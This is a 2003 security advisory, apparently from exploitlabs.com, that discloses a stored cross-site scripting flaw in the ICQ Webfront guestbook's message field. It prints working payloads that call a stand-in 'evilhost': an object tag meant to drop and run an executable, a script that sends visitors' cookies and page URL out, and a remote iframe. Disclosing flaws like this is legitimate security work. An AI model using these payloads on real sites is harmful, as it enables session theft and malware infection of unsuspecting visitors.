ICQ Webfront - Persistant XSS

2003-09-09T00:00:00
ID SECURITYVULNS:DOC:5071
Type securityvulns
Reporter Securityvulns
Modified 2003-09-09T00:00:00

Description


      - EXPL-A-2003-024 exploitlabs.com Advisory 024

                             -= ICQ Webfront =-

Donnie Werner Sept 09 2003 exploitlabs.com

Vunerability(s):

  1. Persistant Remote XSS

note: this is not http://www.securiteam.com/windowsntfocus/5QP0N2K40I.html

Product:

ICQ Webfront guestbook

http://www.icq.com/hpf/ http://www.icq.com/hpf/download.html

Description of product:

The ICQ Web Front is a simple tool designed for creating your very own Web site, which communicates directly with your ICQ. The pages of your Web site are stored in your PC, and when you are online your PC acts as a mini server, which other ICQ users and the Internet community at large can connect to and view. The ICQ Web Front will enable other ICQ and Internet users to request a chat with you, send messages directly to your Contact List, view your personal details including your picture, and even download pre-defined files from your hard disk.

VUNERABILITY / EXPLOIT

http://[host]/guestbook.html

message field is vuln to all xss issues to be stored for other visitors to have executed upon them as the page loads.

ex 1:

<object style="display:none" data="http://evilhost/bad.asp"> </object>

dropping and executing a .exe of the attackers choice on vunerable browsers ala eeye or malware's mad <object> teknikz who says you cant root via the XSS !!!

ex 2:

<SCRIPT>location.href="http://evilhost/xss.cgi?ref="+document.URL+"cookie="+docu ment.cookie;</script>

cookie grabbin'

ex 3:

<iframe src="http://evilhost.com"></iframe>

remote frame content inclusion

etc etc etc...

Local:

yeh, sabotage your visitors

Remote:

yeh, visitors/attackers sabotage you and visitors

Vendor Fix:

No fix on 0day

Vendor Contact:

Concurrent with this advisory security@icq.com

Credits:

Donnie Werner morning_wood@e2-labs.com

http://e2-labs.com http://nothackers.org

Original advisory may be found at http://exploitlabs.com/files/advisories/EXPL-A-2003-024-icq-webfront.txt